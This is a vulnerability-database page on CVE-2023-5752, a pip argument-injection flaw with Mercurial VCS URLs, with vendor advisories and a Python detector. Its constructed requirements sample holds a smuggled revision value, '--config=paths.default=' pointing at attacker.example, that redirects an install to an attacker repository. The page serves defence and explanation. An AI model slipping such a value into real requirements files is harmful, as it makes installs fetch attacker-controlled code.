CVE-2023-5752
Published 2023-10-25. CVE-2023-5752: When installing a package from a Mercurial VCS URL (i.e. "pip install hg+...") with pip prior to v23.3, the specified Mercurial revision could be used to inject…
Priority: P4 (low). CVSS 3.1 base score: 3.3, vector AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
EPSS: 0.48% (37.5th percentile)
When installing a package from a Mercurial VCS URL (i.e. "pip install hg+...") with pip prior to v23.3, the specified Mercurial revision could be used to inject arbitrary configuration options into the "hg clone" call (e.g. "--config"). Controlling the Mercurial configuration can modify how and which repository is installed. This vulnerability does not affect users who aren't installing from Mercurial.
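As an added illustration of the description above (example code written for this page, not pip's own implementation and not taken from any of the advisories), the block below shows the two argv shapes that matter: a revision taken from an `hg+<url>@<rev>` requirement appended as a bare trailing argument, which a getopt-style parser such as Mercurial's reads as an option whenever it begins with `-`, and the same revision bound as `--rev=<rev>`, which keeps the untrusted string an option value. It also scans a constructed requirements file for `hg+` lines whose revision would be parsed as an option. Assumptions: the revision is whatever follows the last `@` in the URL path and the `#egg=` fragment is ignored (a simplification of pip's URL handling); `hg update` is used as the illustrative subcommand; and `--rev=` binding is shown as one possible hardening, not as the exact change in the pip PR linked under references.

```python
"""Added illustration for CVE-2023-5752 (example code, not pip's own).

Shows why a Mercurial revision taken from an "hg+<url>@<rev>" requirement
must never be appended to the hg command line as a bare positional argument,
and flags requirements whose revision would be parsed by hg as an option.
"""
from typing import List, Optional, Tuple
from urllib.parse import urlsplit


def split_hg_requirement(req: str) -> Optional[Tuple[str, str]]:
    """Return (repo_url, rev) for an "hg+<url>[@<rev>][#fragment]" requirement.

    Assumption for this example: the revision is whatever follows the last '@'
    in the URL path, and the fragment (e.g. '#egg=name') is dropped. Returns
    None for anything that is not a Mercurial VCS URL.
    """
    if not req.startswith("hg+"):
        return None
    parts = urlsplit(req[len("hg+"):])
    path, rev = parts.path, ""
    if "@" in path:
        path, rev = path.rsplit("@", 1)
    repo_url = parts._replace(path=path, fragment="").geturl()
    return repo_url, rev


def hg_argv(subcommand: str, rev: str, hardened: bool) -> List[str]:
    """Build the argv that pip-style code would hand to subprocess.

    hardened=False reproduces the pre-23.3 shape: the revision is a bare
    trailing argument, so a revision starting with '-' becomes an hg option.
    hardened=True binds it as '--rev=<rev>', so hg sees one option whose
    *value* is the untrusted string. (Illustrative; the real change is in
    the pip PR linked under references.)
    """
    if hardened:
        return ["hg", subcommand, "-q", f"--rev={rev}"]
    return ["hg", subcommand, "-q", rev]


def parsed_as_option(arg: str) -> bool:
    """hg, like other getopt-style parsers, treats any argument beginning
    with '-' as an option rather than an operand."""
    return arg.startswith("-")


def find_option_injecting_requirements(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, revision) for every hg+ requirement whose
    revision would be parsed as an hg option, e.g. '--config=...'."""
    hits: List[Tuple[int, str]] = []
    for lineno, line in enumerate(lines, start=1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        split = split_hg_requirement(line)
        if split is None:
            continue
        _, rev = split
        if parsed_as_option(rev):
            hits.append((lineno, rev))
    return hits


# Constructed sample requirements file for this example (not from any real project).
# Line 3 carries a revision that would redirect the clone via paths.default.
CONSTRUCTED_REQUIREMENTS = """\
requests==2.31.0
hg+https://hg.example.test/lib@v1.2.0#egg=lib
hg+https://hg.example.test/lib@--config=paths.default=https://attacker.example/evil#egg=lib
git+https://git.example.test/other@main#egg=other
"""


if __name__ == "__main__":
    for lineno, rev in find_option_injecting_requirements(CONSTRUCTED_REQUIREMENTS.splitlines()):
        print(f"line {lineno}: revision {rev!r}")
        print("  pre-23.3 argv :", hg_argv("update", rev, hardened=False))
        print("  hardened argv :", hg_argv("update", rev, hardened=True))
```

Run the file directly to print both argv forms for each flagged line. A revision such as `--config=paths.default=...` reaching the hg command line is exactly the "which repository is installed" case in the description; rejecting revisions that start with `-` before they reach pip is a cheap pre-install check for any environment still running pip older than 23.3.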
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | python-pip | < python-pip 20.3.4-4+deb11u2 (bullseye) | python-pip 20.3.4-4+deb11u2 (bullseye) |
| msrc | azl3_mozjs_102.15.1-1_on_azure_linux_3.0 | — | — |
| msrc | azl3_python3_3.12.0-4_on_azure_linux_3.0 | — | — |
| msrc | azl3_python3_3.12.3-1_on_azure_linux_3.0 | — | — |
| msrc | azl3_tensorflow_2.16.1-9_on_azure_linux_3.0 | — | — |
| msrc | azure_linux_3.0_arm | — | — |
| msrc | azure_linux_3.0_x64 | — | — |
| msrc | cbl2_python-virtualenv_20.26.6-1_on_cbl_mariner_2.0 | — | — |
| msrc | cbl2_python3_3.9.19-13_on_cbl_mariner_2.0 | — | — |
| paloalto | pan-os | — | — |
| pypa | pip | < 23.3 | 23.3 |
| pypa | pip | >= 0 < 23.3 | 23.3 |
CVSS provenance
| Source | Score | Severity | Vector |
|---|---|---|---|
| nvd (v3.1) | 3.3 | LOW | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N |
| osv | 3.3 | LOW | — |
| vendor_debian | 5.5 | MEDIUM | — |
| vendor_msrc | 5.5 | MEDIUM | — |
| vendor_redhat | 5.5 | MEDIUM | — |
| vendor_oracle | 3.3 | MEDIUM | — |
The distribution vendors (Debian, MSRC, Red Hat) rate this 5.5 MEDIUM against 3.3 LOW from NVD and OSV; whichever score is used, the issue is only reachable when a package is installed from a Mercurial VCS URL.
GHSA
Command Injection in pip when used with Mercurial
ghsa·2023-10-25·severity MEDIUM·CWE-77
When installing a package from a Mercurial VCS URL, e.g. `pip install hg+...`, with pip prior to v23.3, the specified Mercurial revision could be used to inject arbitrary configuration options to the `hg clone` call (e.g. `--config`). Controlling the Mercurial configuration can modify how and which repository is installed. This vulnerability does not affect users who aren't installing from Mercurial.
OSV
Command Injection in pip when used with Mercurial
osv·2023-10-25·severity MEDIUM (same advisory text as the GHSA entry above)
Palo Alto
PAN-SA-2025-0012 Informational Bulletin: OSS CVEs Fixed in PAN-OS
vendor_paloalto·2025-07-09·CVSS 7.5 (the bulletin's HIGH rating is attached to CVE-2018-6594, not to CVE-2023-5752; the bulletin covers several OSS CVEs and this page lists PAN-OS as affected by CVE-2023-5752)
The Palo Alto Networks Product Security Assurance team has evaluated the following open source software (OSS) CVEs as they relate to PAN-OS. While it was not determined that these CVEs have any significant impact on PAN-OS, they have been fixed out of an abundance of caution.
CVE-2018-6594: fixed in PAN-OS 10.2.17, 11.1.11, 11.2.8, 12.1.2, and all later versions of PAN-OS
CVE-2018-25032: fixed in PAN-OS 10.1.7, 10.2.2, and all later versions of PAN-OS
CVE-2019-5827: fixed in PAN-OS 11.1.4, and all later versions of PAN-OS
CVE-2019-13750: fixed in PAN-OS 11.1.4, and all later versions of PAN-OS
CVE-2019-13751: fixed in PAN-OS 11.1.4, and all later versions
The excerpt is cut off before the bulletin's line for CVE-2023-5752.
Oracle
Oracle PeopleSoft Risk Matrix: Porting (pip) vulnerability, CVE-2023-5752
vendor_oracle·2024-10-15·CVSS 3.3·severity MEDIUM
CVE: CVE-2023-5752
CVSS: 3.3
Protocol: None
Remote exploit: No
Attack vector: Local
Advisory: cpuoct2024 (Oracle Critical Patch Update, October 2024)
Red Hat
pip: Mercurial configuration injectable in repo revision when installing via pip
vendor_redhat·2023-10-25·CVSS 5.5·severity MEDIUM·CWE-77
When installing a package from a Mercurial VCS URL (i.e. "pip install hg+...") with pip prior to v23.3, the specified Mercurial revision could be used to inject arbitrary configuration options into the "hg clone" call (e.g. "--config"). Controlling the Mercurial configuration can modify how and which repository is installed. This vulnerability does not affect users who aren't installing from Mercurial.
A flaw was found in the Python pip package. pip could allow a local authenticated attacker to bypass security restrictions due to a flaw when installing a package from a Mercurial VCS URL. By sending a specially crafted request, an attacker can inject arbitrary configuration options to the "hg clone" call to mod
Microsoft
Mercurial configuration injectable in repo revision when installing via pip
vendor_msrc·2023-10-10·CVSS 5.5·severity MEDIUM·CWE-77
FAQ: Is Azure Linux the only Microsoft product that includes this open-source library and is therefore potentially affected by this vulnerability?
One of the main benefits to our customers who choose to use the Azure Linux distro is the commitment to keep it up to date with the most recent and most secure versions of the open source libraries with which the distro is composed. Microsoft is committed to transparency in this work which is why we began publishing CSAF/VEX in October 2025. See this blog post for more information. If impact to additional products is identified, we will update the CVE to reflect this.
Mariner: Mariner
PSF: PSF
Customer Action Required: Yes
Remediation: CBL-Mariner Releases
Referenc
Debian
CVE-2023-5752: python-pip
vendor_debian·2023·CVSS 5.5·severity MEDIUM
When installing a package from a Mercurial VCS URL (ie "pip install hg+...") with pip prior to v23.3, the specified Mercurial revision could be used to inject arbitrary configuration options to the "hg clone" call (ie "--config"). Controlling the Mercurial configuration can modify how and which repository is installed. This vulnerability does not affect users who aren't installing from Mercurial.
Scope: local
bookworm: open
bullseye: resolved (fixed in 20.3.4-4+deb11u2)
forky: resolved (fixed in 23.3+dfsg-1)
sid: resolved (fixed in 23.3+dfsg-1)
trixie: resolved (fixed in 23.3+dfsg-1)
No detection rules found.
No public exploits indexed.
References
https://github.com/pypa/pip/pull/12306
https://lists.debian.org/debian-lts-announce/2025/10/msg00028.html
https://lists.fedoraproject.org/archives/list/[email protected]/message/622OZXWG72ISQPLM5Y57YCVIMWHD4C3U/
https://lists.fedoraproject.org/archives/list/[email protected]/message/65UKKF5LBHEFDCUSPBHUN4IHYX7SRMHH/
https://lists.fedoraproject.org/archives/list/[email protected]/message/FXUVMJM25PUAZRQZBF54OFVKTY3MINPW/
https://lists.fedoraproject.org/archives/list/[email protected]/message/KFC2SPFG5FLCZBYY2K3T5MFW2D22NG6E/
https://lists.fedoraproject.org/archives/list/[email protected]/message/YBSB3SUPQ3VIFYUMHPO3MEQI4BJAXKCZ/
https://mail.python.org/archives/list/[email protected]/thread/F4PL35U6X4VVHZ5ILJU3PWUWN7H7LZXL/
Published: 2023-10-25